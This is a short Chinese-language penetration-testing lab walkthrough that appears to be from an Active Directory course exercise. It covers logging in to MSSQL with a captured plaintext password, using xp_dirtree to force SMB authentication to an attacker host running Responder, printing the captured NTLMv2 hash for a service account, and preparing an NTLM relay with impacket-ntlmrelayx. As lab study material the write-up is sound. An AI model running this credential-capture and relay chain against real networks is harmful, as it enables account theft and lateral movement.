发现用获取的凭证:will/fdsfssdfDFG4,可以登录151MSSQL

proxychains4 impacket-mssqlclient <will:[email protected]> -port 1433 -windows-auth

用**-windows-auth**进行认证,不然登录不了:

15.png

查找linked server

SQL> select srvname from sysservers;

16.png

查看登录的用户名:

SQL> select system_user;

17.png

显然,当前登录的用户不是sysadmin权限。参考P580的攻击方式。

responder -I tun0

18.png

SQL> EXECUTE('master..xp_dirtree "\\\\192.168.49.64\\a"');

19.png

responder那个终端显示如下:

20.png

[SMB] NTLMv2-SSP Client   : ::ffff:192.168.64.159
[SMB] NTLMv2-SSP Username : TRICKY\\sqlsvc
[SMB] NTLMv2-SSP Hash     : sqlsvc::TRICKY:80e42d2692c2d0d7:E67868298AC29BC3733EBF15050EAFFB:010100000000000080B0C577AE9FD8018CCD3A5CAE97F098000000000200080037004D003900590001001E00570049004E002D00390058004B0054004F00490055005100580047004D0004003400570049004E002D00390058004B0054004F00490055005100580047004D002E0037004D00390059002E004C004F00430041004C000300140037004D00390059002E004C004F00430041004C000500140037004D00390059002E004C004F00430041004C000700080080B0C577AE9FD80106000400020000000800300030000000000000000000000000300000EAB56095DB82EF7C3EC835B05F4C8C0C1D6741115F96F86D548C46B4B2DEC2650A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100360038002E00340039002E00360034000000000000000000

密码似乎破解不出来,换一种意思。参考P584

proxychains4 impacket-ntlmrelayx --no-http-server -smb2support -t smb://172.16.64.152